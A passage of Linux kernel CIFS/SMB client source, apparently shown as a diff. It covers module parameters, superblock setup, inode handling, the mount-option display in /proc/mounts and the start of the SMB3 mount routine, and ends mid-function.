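++ * DOS dates pack (year - 1980) in bits 15..9, the month in bits 8..5 and
++ * the day in bits 4..0; DOS times pack hours in bits 15..11, minutes in
++ * bits 10..5 and two-second units in bits 4..0, so SMB_TIME_MAX above is
++ * 23:59:58.
++ */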
++
++int cifsFYI = 0;
++bool traceSMB;
++bool enable_oplocks = true;
++bool linuxExtEnabled = true;
++bool lookupCacheEnabled = true;
++bool disable_legacy_dialects; /* false by default */
++bool enable_gcm_256 = true;
++bool require_gcm_256; /* false by default */
++bool enable_negotiate_signing; /* false by default */
++unsigned int global_secflags = CIFSSEC_DEF;
++/* unsigned int ntlmv2_support = 0; */
++unsigned int sign_CIFS_PDUs = 1;
++
++/*
++ * Global transaction id (XID) information
++ */
++unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
++unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
++unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
++spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
++
++/*
++ *  Global counters, updated atomically
++ */
++atomic_t sesInfoAllocCount;
++atomic_t tconInfoAllocCount;
++atomic_t tcpSesNextId;
++atomic_t tcpSesAllocCount;
++atomic_t tcpSesReconnectCount;
++atomic_t tconInfoReconnectCount;
++
++atomic_t mid_count;
++atomic_t buf_alloc_count;
++atomic_t small_buf_alloc_count;
++#ifdef CONFIG_CIFS_STATS2
++atomic_t total_buf_alloc_count;
++atomic_t total_small_buf_alloc_count;
++#endif/* STATS2 */
++struct list_head	cifs_tcp_ses_list;
++spinlock_t		cifs_tcp_ses_lock;
++static const struct super_operations cifs_super_ops;
++unsigned int CIFSMaxBufSize = CIFS_MAX_MSGSIZE;
++module_param(CIFSMaxBufSize, uint, 0444);
++MODULE_PARM_DESC(CIFSMaxBufSize, "Network buffer size (not including header) "
++				 "for CIFS requests. "
++				 "Default: 16384 Range: 8192 to 130048");
++unsigned int cifs_min_rcv = CIFS_MIN_RCV_POOL;
++module_param(cifs_min_rcv, uint, 0444);
++MODULE_PARM_DESC(cifs_min_rcv, "Network buffers in pool. Default: 4 Range: "
++				"1 to 64");
++unsigned int cifs_min_small = 30;
++module_param(cifs_min_small, uint, 0444);
++MODULE_PARM_DESC(cifs_min_small, "Small network buffers in pool. Default: 30 "
++				 "Range: 2 to 256");
++unsigned int cifs_max_pending = CIFS_MAX_REQ;
++module_param(cifs_max_pending, uint, 0444);
++MODULE_PARM_DESC(cifs_max_pending, "Simultaneous requests to server for "
++				   "CIFS/SMB1 dialect (N/A for SMB3) "
++				   "Default: 32767 Range: 2 to 32767.");
++#ifdef CONFIG_CIFS_STATS2
++unsigned int slow_rsp_threshold = 1;
++module_param(slow_rsp_threshold, uint, 0644);
++MODULE_PARM_DESC(slow_rsp_threshold, "Amount of time (in seconds) to wait "
++				   "before logging that a response is delayed. "
++				   "Default: 1 (if set to 0 disables msg).");
++#endif /* STATS2 */
++
++module_param(enable_oplocks, bool, 0644);
++MODULE_PARM_DESC(enable_oplocks, "Enable or disable oplocks. Default: y/Y/1");
++
++module_param(enable_gcm_256, bool, 0644);
++MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: n/N/0");
++
++module_param(require_gcm_256, bool, 0644);
++MODULE_PARM_DESC(require_gcm_256, "Require strongest (256 bit) GCM encryption. Default: n/N/0");
++
++module_param(enable_negotiate_signing, bool, 0644);
++MODULE_PARM_DESC(enable_negotiate_signing, "Enable negotiating packet signing algorithm with server. Default: n/N/0");
++
++module_param(disable_legacy_dialects, bool, 0644);
++MODULE_PARM_DESC(disable_legacy_dialects, "To improve security it may be "
++				  "helpful to restrict the ability to "
++				  "override the default dialects (SMB2.1, "
++				  "SMB3 and SMB3.02) on mount with old "
++				  "dialects (CIFS/SMB1 and SMB2) since "
++				  "vers=1.0 (CIFS/SMB1) and vers=2.0 are weaker"
++				  " and less secure. Default: n/N/0");
++
++extern mempool_t *cifs_sm_req_poolp;
++extern mempool_t *cifs_req_poolp;
++extern mempool_t *cifs_mid_poolp;
++
++struct workqueue_struct	*cifsiod_wq;
++struct workqueue_struct	*decrypt_wq;
++struct workqueue_struct	*fileinfo_put_wq;
++struct workqueue_struct	*cifsoplockd_wq;
++struct workqueue_struct	*deferredclose_wq;
++__u32 cifs_lock_secret;
++
++/*
++ * Bumps refcount for cifs super block.
++ * Note that it should only be called if a reference to the VFS super block
++ * is already held, e.g. in open-type syscalls context. Otherwise it can race
++ * with atomic_dec_and_test in deactivate_locked_super.
++ */
++void
++cifs_sb_active(struct super_block *sb)
++{
++	struct cifs_sb_info *server = CIFS_SB(sb);
++
++	if (atomic_inc_return(&server->active) == 1)
++		atomic_inc(&sb->s_active);
++}
++
++void
++cifs_sb_deactive(struct super_block *sb)
++{
++	struct cifs_sb_info *server = CIFS_SB(sb);
++
++	if (atomic_dec_and_test(&server->active))
++		deactivate_super(sb);
++}
++
++static int
++cifs_read_super(struct super_block *sb)
++{
++	struct inode *inode;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct timespec64 ts;
++	int rc = 0;
++
++	cifs_sb = CIFS_SB(sb);
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIXACL)
++		sb->s_flags |= SB_POSIXACL;
++
++	if (tcon->snapshot_time)
++		sb->s_flags |= SB_RDONLY;
++
++	if (tcon->ses->capabilities & tcon->ses->server->vals->cap_large_files)
++		sb->s_maxbytes = MAX_LFS_FILESIZE;
++	else
++		sb->s_maxbytes = MAX_NON_LFS;
++
++	/*
++	 * Some very old servers like DOS and OS/2 used 2 second granularity
++	 * (while all current servers use 100ns granularity - see MS-DTYP)
++	 * but 1 second is the maximum allowed granularity for the VFS
++	 * so for old servers set time granularity to 1 second while for
++	 * everything else (current servers) set it to 100ns.
++	 */
++	if ((tcon->ses->server->vals->protocol_id == SMB10_PROT_ID) &&
++	    ((tcon->ses->capabilities &
++	      tcon->ses->server->vals->cap_nt_find) == 0) &&
++	    !tcon->unix_ext) {
++		sb->s_time_gran = 1000000000; /* 1 second is max allowed gran */
++		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MIN), 0, 0);
++		sb->s_time_min = ts.tv_sec;
++		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MAX),
++				    cpu_to_le16(SMB_TIME_MAX), 0);
++		sb->s_time_max = ts.tv_sec;
++	} else {
++		/*
++		 * Almost every server, including all SMB2+, uses DCE TIME
++		 * ie 100 nanosecond units, since 1601.  See MS-DTYP and MS-FSCC
++		 */
++		sb->s_time_gran = 100;
++		ts = cifs_NTtimeToUnix(0);
++		sb->s_time_min = ts.tv_sec;
++		ts = cifs_NTtimeToUnix(cpu_to_le64(S64_MAX));
++		sb->s_time_max = ts.tv_sec;
++	}
++
++	sb->s_magic = CIFS_SUPER_MAGIC;
++	sb->s_op = &cifs_super_ops;
++	sb->s_xattr = cifs_xattr_handlers;
++	rc = super_setup_bdi(sb);
++	if (rc)
++		goto out_no_root;
++	/* tune readahead according to rsize if readahead size not set on mount */
++	if (cifs_sb->ctx->rsize == 0)
++		cifs_sb->ctx->rsize =
++			tcon->ses->server->ops->negotiate_rsize(tcon, cifs_sb->ctx);
++	if (cifs_sb->ctx->rasize)
++		sb->s_bdi->ra_pages = cifs_sb->ctx->rasize / PAGE_SIZE;
++	else
++		sb->s_bdi->ra_pages = cifs_sb->ctx->rsize / PAGE_SIZE;
++
++	sb->s_blocksize = CIFS_MAX_MSGSIZE;
++	sb->s_blocksize_bits = 14;	/* default 2**14 = CIFS_MAX_MSGSIZE */
++	inode = cifs_root_iget(sb);
++
++	if (IS_ERR(inode)) {
++		rc = PTR_ERR(inode);
++		goto out_no_root;
++	}
++
++	if (tcon->nocase)
++		sb->s_d_op = &cifs_ci_dentry_ops;
++	else
++		sb->s_d_op = &cifs_dentry_ops;
++
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		rc = -ENOMEM;
++		goto out_no_root;
++	}
++
++#ifdef CONFIG_CIFS_NFSD_EXPORT
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
++		cifs_dbg(FYI, "export ops supported\n");
++		sb->s_export_op = &cifs_export_ops;
++	}
++#endif /* CONFIG_CIFS_NFSD_EXPORT */
++
++	return 0;
++
++out_no_root:
++	cifs_dbg(VFS, "%s: get root inode failed\n", __func__);
++	return rc;
++}
++
++static void cifs_kill_sb(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	/*
++	 * We need to release all dentries for the cached directories
++	 * before we kill the sb.
++	 */
++	if (cifs_sb->root) {
++		close_all_cached_dirs(cifs_sb);
++
++		/* finally release root dentry */
++		dput(cifs_sb->root);
++		cifs_sb->root = NULL;
++	}
++
++	kill_anon_super(sb);
++	cifs_umount(cifs_sb);
++}
++
++static int
++cifs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int xid;
++	int rc = 0;
++
++	xid = get_xid();
++
++	if (le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength) > 0)
++		buf->f_namelen =
++		       le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
++	else
++		buf->f_namelen = PATH_MAX;
++
++	buf->f_fsid.val[0] = tcon->vol_serial_number;
++	/* we use part of the create time for extra randomness, see man statfs */
++	buf->f_fsid.val[1] =  (int)le64_to_cpu(tcon->vol_create_time);
++
++	buf->f_files = 0;	/* undefined */
++	buf->f_ffree = 0;	/* unlimited */
++
++	if (server->ops->queryfs)
++		rc = server->ops->queryfs(xid, tcon, cifs_sb, buf);
++
++	free_xid(xid);
++	return rc;
++}
++
++static long cifs_fallocate(struct file *file, int mode, loff_t off, loff_t len)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	if (server->ops->fallocate)
++		return server->ops->fallocate(file, tcon, mode, off, len);
++
++	return -EOPNOTSUPP;
++}
++
++static int cifs_permission(struct user_namespace *mnt_userns,
++			   struct inode *inode, int mask)
++{
++	struct cifs_sb_info *cifs_sb;
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM) {
++		if ((mask & MAY_EXEC) && !execute_ok(inode))
++			return -EACCES;
++		else
++			return 0;
++	} else /* the file mode might have been restricted at mount time
++		on the client (above and beyond any ACL on the server) for
++		servers which do not support setting and viewing mode bits,
++		so allowing the client to check permissions is useful */
++		return generic_permission(&init_user_ns, inode, mask);
++}
++
++static struct kmem_cache *cifs_inode_cachep;
++static struct kmem_cache *cifs_req_cachep;
++static struct kmem_cache *cifs_mid_cachep;
++static struct kmem_cache *cifs_sm_req_cachep;
++mempool_t *cifs_sm_req_poolp;
++mempool_t *cifs_req_poolp;
++mempool_t *cifs_mid_poolp;
++
++static struct inode *
++cifs_alloc_inode(struct super_block *sb)
++{
++	struct cifsInodeInfo *cifs_inode;
++	cifs_inode = alloc_inode_sb(sb, cifs_inode_cachep, GFP_KERNEL);
++	if (!cifs_inode)
++		return NULL;
++	cifs_inode->cifsAttrs = 0x20;	/* default: ATTR_ARCHIVE */
++	cifs_inode->time = 0;
++	/*
++	 * Until the file is open and we have gotten oplock info back from the
++	 * server, we can not assume caching of file data or metadata.
++	 */
++	cifs_set_oplock_level(cifs_inode, 0);
++	cifs_inode->flags = 0;
++	spin_lock_init(&cifs_inode->writers_lock);
++	cifs_inode->writers = 0;
++	cifs_inode->netfs.inode.i_blkbits = 14;  /* 2**14 = CIFS_MAX_MSGSIZE */
++	cifs_inode->server_eof = 0;
++	cifs_inode->uniqueid = 0;
++	cifs_inode->createtime = 0;
++	cifs_inode->epoch = 0;
++	spin_lock_init(&cifs_inode->open_file_lock);
++	generate_random_uuid(cifs_inode->lease_key);
++	cifs_inode->symlink_target = NULL;
++
++	/*
++	 * Can not set i_flags here - they get immediately overwritten to zero
++	 * by the VFS.
++	 */
++	/* cifs_inode->netfs.inode.i_flags = S_NOATIME | S_NOCMTIME; */
++	INIT_LIST_HEAD(&cifs_inode->openFileList);
++	INIT_LIST_HEAD(&cifs_inode->llist);
++	INIT_LIST_HEAD(&cifs_inode->deferred_closes);
++	spin_lock_init(&cifs_inode->deferred_lock);
++	return &cifs_inode->netfs.inode;
++}
++
++static void
++cifs_free_inode(struct inode *inode)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++
++	if (S_ISLNK(inode->i_mode))
++		kfree(cinode->symlink_target);
++	kmem_cache_free(cifs_inode_cachep, cinode);
++}
++
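++/* evict_inode: release the inode's page cache and its fscache cookie */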
++static void
++cifs_evict_inode(struct inode *inode)
++{
++	truncate_inode_pages_final(&inode->i_data);
++	if (inode->i_state & I_PINNING_FSCACHE_WB)
++		cifs_fscache_unuse_inode_cookie(inode, true);
++	cifs_fscache_release_inode_cookie(inode);
++	clear_inode(inode);
++}
++
++static void
++cifs_show_address(struct seq_file *s, struct TCP_Server_Info *server)
++{
++	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
++	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
++
++	seq_puts(s, ",addr=");
++
++	switch (server->dstaddr.ss_family) {
++	case AF_INET:
++		seq_printf(s, "%pI4", &sa->sin_addr.s_addr);
++		break;
++	case AF_INET6:
++		seq_printf(s, "%pI6", &sa6->sin6_addr.s6_addr);
++		if (sa6->sin6_scope_id)
++			seq_printf(s, "%%%u", sa6->sin6_scope_id);
++		break;
++	default:
++		seq_puts(s, "(unknown)");
++	}
++	if (server->rdma)
++		seq_puts(s, ",rdma");
++}
++
++static void
++cifs_show_security(struct seq_file *s, struct cifs_ses *ses)
++{
++	if (ses->sectype == Unspecified) {
++		if (ses->user_name == NULL)
++			seq_puts(s, ",sec=none");
++		return;
++	}
++
++	seq_puts(s, ",sec=");
++
++	switch (ses->sectype) {
++	case NTLMv2:
++		seq_puts(s, "ntlmv2");
++		break;
++	case Kerberos:
++		seq_puts(s, "krb5");
++		break;
++	case RawNTLMSSP:
++		seq_puts(s, "ntlmssp");
++		break;
++	default:
++		/* shouldn't ever happen */
++		seq_puts(s, "unknown");
++		break;
++	}
++
++	if (ses->sign)
++		seq_puts(s, "i");
++
++	if (ses->sectype == Kerberos)
++		seq_printf(s, ",cruid=%u",
++			   from_kuid_munged(&init_user_ns, ses->cred_uid));
++}
++
++static void
++cifs_show_cache_flavor(struct seq_file *s, struct cifs_sb_info *cifs_sb)
++{
++	seq_puts(s, ",cache=");
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
++		seq_puts(s, "strict");
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO)
++		seq_puts(s, "none");
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
++		seq_puts(s, "singleclient"); /* assume only one client access */
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE)
++		seq_puts(s, "ro"); /* read only caching assumed */
++	else
++		seq_puts(s, "loose");
++}
++
++/*
++ * cifs_show_devname() is used so we show the mount device name with correct
++ * format (e.g. forward slashes vs. back slashes) in /proc/mounts
++ */
++static int cifs_show_devname(struct seq_file *m, struct dentry *root)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
++	char *devname = kstrdup(cifs_sb->ctx->source, GFP_KERNEL);
++
++	if (devname == NULL)
++		seq_puts(m, "none");
++	else {
++		convert_delimiter(devname, '/');
++		/* escape all spaces in share names */
++		seq_escape(m, devname, " \t");
++		kfree(devname);
++	}
++	return 0;
++}
++
++/*
++ * cifs_show_options() is for displaying mount options in /proc/mounts.
++ * Not all settable options are displayed but most of the important
++ * ones are.
++ */
++static int
++cifs_show_options(struct seq_file *s, struct dentry *root)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct sockaddr *srcaddr;
++	srcaddr = (struct sockaddr *)&tcon->ses->server->srcaddr;
++
++	seq_show_option(s, "vers", tcon->ses->server->vals->version_string);
++	cifs_show_security(s, tcon->ses);
++	cifs_show_cache_flavor(s, cifs_sb);
++
++	if (tcon->no_lease)
++		seq_puts(s, ",nolease");
++	if (cifs_sb->ctx->multiuser)
++		seq_puts(s, ",multiuser");
++	else if (tcon->ses->user_name)
++		seq_show_option(s, "username", tcon->ses->user_name);
++
++	if (tcon->ses->domainName && tcon->ses->domainName[0] != 0)
++		seq_show_option(s, "domain", tcon->ses->domainName);
++
++	if (srcaddr->sa_family != AF_UNSPEC) {
++		struct sockaddr_in *saddr4;
++		struct sockaddr_in6 *saddr6;
++		saddr4 = (struct sockaddr_in *)srcaddr;
++		saddr6 = (struct sockaddr_in6 *)srcaddr;
++		if (srcaddr->sa_family == AF_INET6)
++			seq_printf(s, ",srcaddr=%pI6c",
++				   &saddr6->sin6_addr);
++		else if (srcaddr->sa_family == AF_INET)
++			seq_printf(s, ",srcaddr=%pI4",
++				   &saddr4->sin_addr.s_addr);
++		else
++			seq_printf(s, ",srcaddr=BAD-AF:%i",
++				   (int)(srcaddr->sa_family));
++	}
++
++	seq_printf(s, ",uid=%u",
++		   from_kuid_munged(&init_user_ns, cifs_sb->ctx->linux_uid));
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)
++		seq_puts(s, ",forceuid");
++	else
++		seq_puts(s, ",noforceuid");
++
++	seq_printf(s, ",gid=%u",
++		   from_kgid_munged(&init_user_ns, cifs_sb->ctx->linux_gid));
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)
++		seq_puts(s, ",forcegid");
++	else
++		seq_puts(s, ",noforcegid");
++
++	cifs_show_address(s, tcon->ses->server);
++
++	if (!tcon->unix_ext)
++		seq_printf(s, ",file_mode=0%ho,dir_mode=0%ho",
++					   cifs_sb->ctx->file_mode,
++					   cifs_sb->ctx->dir_mode);
++	if (cifs_sb->ctx->iocharset)
++		seq_printf(s, ",iocharset=%s", cifs_sb->ctx->iocharset);
++	if (tcon->seal)
++		seq_puts(s, ",seal");
++	else if (tcon->ses->server->ignore_signature)
++		seq_puts(s, ",signloosely");
++	if (tcon->nocase)
++		seq_puts(s, ",nocase");
++	if (tcon->nodelete)
++		seq_puts(s, ",nodelete");
++	if (cifs_sb->ctx->no_sparse)
++		seq_puts(s, ",nosparse");
++	if (tcon->local_lease)
++		seq_puts(s, ",locallease");
++	if (tcon->retry)
++		seq_puts(s, ",hard");
++	else
++		seq_puts(s, ",soft");
++	if (tcon->use_persistent)
++		seq_puts(s, ",persistenthandles");
++	else if (tcon->use_resilient)
++		seq_puts(s, ",resilienthandles");
++	if (tcon->posix_extensions)
++		seq_puts(s, ",posix");
++	else if (tcon->unix_ext)
++		seq_puts(s, ",unix");
++	else
++		seq_puts(s, ",nounix");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS)
++		seq_puts(s, ",nodfs");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
++		seq_puts(s, ",posixpaths");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID)
++		seq_puts(s, ",setuids");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
++		seq_puts(s, ",idsfromsid");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
++		seq_puts(s, ",serverino");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		seq_puts(s, ",rwpidforward");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL)
++		seq_puts(s, ",forcemand");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++		seq_puts(s, ",nouser_xattr");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
++		seq_puts(s, ",mapchars");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
++		seq_puts(s, ",mapposix");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
++		seq_puts(s, ",sfu");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++		seq_puts(s, ",nobrl");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_HANDLE_CACHE)
++		seq_puts(s, ",nohandlecache");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
++		seq_puts(s, ",modefromsid");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL)
++		seq_puts(s, ",cifsacl");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
++		seq_puts(s, ",dynperm");
++	if (root->d_sb->s_flags & SB_POSIXACL)
++		seq_puts(s, ",acl");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
++		seq_puts(s, ",mfsymlinks");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
++		seq_puts(s, ",fsc");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)
++		seq_puts(s, ",nostrictsync");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
++		seq_puts(s, ",noperm");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID)
++		seq_printf(s, ",backupuid=%u",
++			   from_kuid_munged(&init_user_ns,
++					    cifs_sb->ctx->backupuid));
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID)
++		seq_printf(s, ",backupgid=%u",
++			   from_kgid_munged(&init_user_ns,
++					    cifs_sb->ctx->backupgid));
++
++	seq_printf(s, ",rsize=%u", cifs_sb->ctx->rsize);
++	seq_printf(s, ",wsize=%u", cifs_sb->ctx->wsize);
++	seq_printf(s, ",bsize=%u", cifs_sb->ctx->bsize);
++	if (cifs_sb->ctx->rasize)
++		seq_printf(s, ",rasize=%u", cifs_sb->ctx->rasize);
++	if (tcon->ses->server->min_offload)
++		seq_printf(s, ",esize=%u", tcon->ses->server->min_offload);
++	seq_printf(s, ",echo_interval=%lu",
++			tcon->ses->server->echo_interval / HZ);
++
++	/* Only display the following if overridden on mount */
++	if (tcon->ses->server->max_credits != SMB2_MAX_CREDITS_AVAILABLE)
++		seq_printf(s, ",max_credits=%u", tcon->ses->server->max_credits);
++	if (tcon->ses->server->tcp_nodelay)
++		seq_puts(s, ",tcpnodelay");
++	if (tcon->ses->server->noautotune)
++		seq_puts(s, ",noautotune");
++	if (tcon->ses->server->noblocksnd)
++		seq_puts(s, ",noblocksend");
++
++	if (tcon->snapshot_time)
++		seq_printf(s, ",snapshot=%llu", tcon->snapshot_time);
++	if (tcon->handle_timeout)
++		seq_printf(s, ",handletimeout=%u", tcon->handle_timeout);
++
++	/*
++	 * Display file and directory attribute timeout in seconds.
++	 * If the file and directory attribute timeouts are the same then
++	 * actimeo was likely specified on mount.
++	 */
++	if (cifs_sb->ctx->acdirmax == cifs_sb->ctx->acregmax)
++		seq_printf(s, ",actimeo=%lu", cifs_sb->ctx->acregmax / HZ);
++	else {
++		seq_printf(s, ",acdirmax=%lu", cifs_sb->ctx->acdirmax / HZ);
++		seq_printf(s, ",acregmax=%lu", cifs_sb->ctx->acregmax / HZ);
++	}
++	seq_printf(s, ",closetimeo=%lu", cifs_sb->ctx->closetimeo / HZ);
++
++	if (tcon->ses->chan_max > 1)
++		seq_printf(s, ",multichannel,max_channels=%zu",
++			   tcon->ses->chan_max);
++
++	if (tcon->use_witness)
++		seq_puts(s, ",witness");
++
++	return 0;
++}
++
++static void cifs_umount_begin(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	spin_lock(&cifs_tcp_ses_lock);
++	spin_lock(&tcon->tc_lock);
++	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
++		/* we have other mounts to the same share or we have
++		   already tried to umount this and woken up
++		   all waiting network requests, nothing to do */
++		spin_unlock(&tcon->tc_lock);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++	/*
++	 * We can not set tcon->status to TID_EXITING yet since we don't know if
++	 * umount -f will fail later (e.g. due to open files).  TID_EXITING is set
++	 * just before the tree disconnect request is sent.
++	 */
++	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	cifs_close_all_deferred_files(tcon);
++	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
++	/* cancel_notify_requests(tcon); */
++	if (tcon->ses && tcon->ses->server) {
++		cifs_dbg(FYI, "wake up tasks now - umount begin not complete\n");
++		wake_up_all(&tcon->ses->server->request_q);
++		wake_up_all(&tcon->ses->server->response_q);
++		msleep(1); /* yield */
++		/* we have to kick the requests once more */
++		wake_up_all(&tcon->ses->server->response_q);
++		msleep(1);
++	}
++
++	return;
++}
++
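++/* freeze_fs: close files with deferred closes so no handles linger while frozen */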
++static int cifs_freeze(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return 0;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_close_all_deferred_files(tcon);
++	return 0;
++}
++
++#ifdef CONFIG_CIFS_STATS2
++static int cifs_show_stats(struct seq_file *s, struct dentry *root)
++{
++	/* BB FIXME */
++	return 0;
++}
++#endif
++
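++/*
++ * Data writeback is driven through the address_space operations, so
++ * ->write_inode only needs to unpin the inode's fscache cookie.
++ */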
++static int cifs_write_inode(struct inode *inode, struct writeback_control *wbc)
++{
++	fscache_unpin_writeback(wbc, cifs_inode_cookie(inode));
++	return 0;
++}
++
++static int cifs_drop_inode(struct inode *inode)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	/* no serverino => unconditional eviction */
++	return !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) ||
++		generic_drop_inode(inode);
++}
++
++static const struct super_operations cifs_super_ops = {
++	.statfs = cifs_statfs,
++	.alloc_inode = cifs_alloc_inode,
++	.write_inode	= cifs_write_inode,
++	.free_inode = cifs_free_inode,
++	.drop_inode	= cifs_drop_inode,
++	.evict_inode	= cifs_evict_inode,
++/*	.show_path	= cifs_show_path, */ /* Would we ever need show path? */
++	.show_devname   = cifs_show_devname,
++/*	.delete_inode	= cifs_delete_inode,  */  /* Do not need above
++	function unless later we add lazy close of inodes or unless the
++	kernel forgets to call us with the same number of releases (closes)
++	as opens */
++	.show_options = cifs_show_options,
++	.umount_begin   = cifs_umount_begin,
++	.freeze_fs      = cifs_freeze,
++#ifdef CONFIG_CIFS_STATS2
++	.show_stats = cifs_show_stats,
++#endif
++};
++
++/*
++ * Get root dentry from superblock according to prefix path mount option.
++ * Return dentry with refcount + 1 on success and an ERR_PTR on failure.
++ */
++static struct dentry *
++cifs_get_root(struct smb3_fs_context *ctx, struct super_block *sb)
++{
++	struct dentry *dentry;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	char *full_path = NULL;
++	char *s, *p;
++	char sep;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
++		return dget(sb->s_root);
++
++	full_path = cifs_build_path_to_root(ctx, cifs_sb,
++				cifs_sb_master_tcon(cifs_sb), 0);
++	if (full_path == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	cifs_dbg(FYI, "Get root dentry for %s\n", full_path);
++
++	sep = CIFS_DIR_SEP(cifs_sb);
++	dentry = dget(sb->s_root);
++	s = full_path;
++
++	do {
++		struct inode *dir = d_inode(dentry);
++		struct dentry *child;
++
++		if (!S_ISDIR(dir->i_mode)) {
++			dput(dentry);
++			dentry = ERR_PTR(-ENOTDIR);
++			break;
++		}
++
++		/* skip separators */
++		while (*s == sep)
++			s++;
++		if (!*s)
++			break;
++		p = s++;
++		/* next separator */
++		while (*s && *s != sep)
++			s++;
++
++		child = lookup_positive_unlocked(p, dentry, s - p);
++		dput(dentry);
++		dentry = child;
++	} while (!IS_ERR(dentry));
++	kfree(full_path);
++	return dentry;
++}
++
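++/* sget() "set" callback: attach the preallocated cifs_sb to a new superblock */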
++static int cifs_set_super(struct super_block *sb, void *data)
++{
++	struct cifs_mnt_data *mnt_data = data;
++	sb->s_fs_info = mnt_data->cifs_sb;
++	return set_anon_super(sb, NULL);
++}
++
++struct dentry *
++cifs_smb3_do_mount(struct file_system_type *fs_type,
++	      int flags, struct smb3_fs_context *old_ctx)
++{
++	int rc;
++	struct super_block *sb = NULL;
++	struct cifs_sb_info *cifs_sb = NULL;
++	struct cifs_mnt_data mnt_data;
++	struct dentry *root;
++
++	/*
++	 * Log the attempted mount operation: as a verbose FYI message if
++	 * CIFS_DEBUG && cifsFYI are enabled, otherwise as a single info line.
++	 */
++	if (cifsFYI)
